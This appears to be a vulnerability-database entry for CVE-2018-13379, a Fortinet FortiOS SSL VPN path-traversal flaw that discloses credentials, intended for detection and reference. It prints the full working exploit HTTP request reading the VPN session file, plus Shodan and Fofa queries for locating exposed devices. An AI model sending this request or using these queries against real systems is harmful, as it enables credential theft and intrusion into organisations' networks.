🔙 목록으로 돌아가기

CVE-2018-13379: Fortinet FortiOS - Credentials Disclosure

TitleFortinet FortiOS - Credentials Disclosure
Authororganiccrap
SeverityCritical
ImpactAn attacker can obtain sensitive information such as usernames and passwords.
RemediationApply the necessary patches or updates provided by Fortinet to fix the vulnerability.
CVSS Score9.8
EPSS Score0.94475
CVE IDCVE-2018-13379
CWE IDCWE-22
Shodan Queryhttp.html:"/remote/login" "xxxxxxxx"http.favicon.hash:945408572cpe:"cpe:2.3:o:fortinet:fortios"port:10443 http.favicon.hash:945408572
Fofa Querybody="/remote/login" "xxxxxxxx"icon_hash=945408572
Tags cve2018 cve fortios lfi kev fortinet vkev vuln

🔍 Vulnerability Description

Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).

🌐 HTTP Request

GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-13379.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A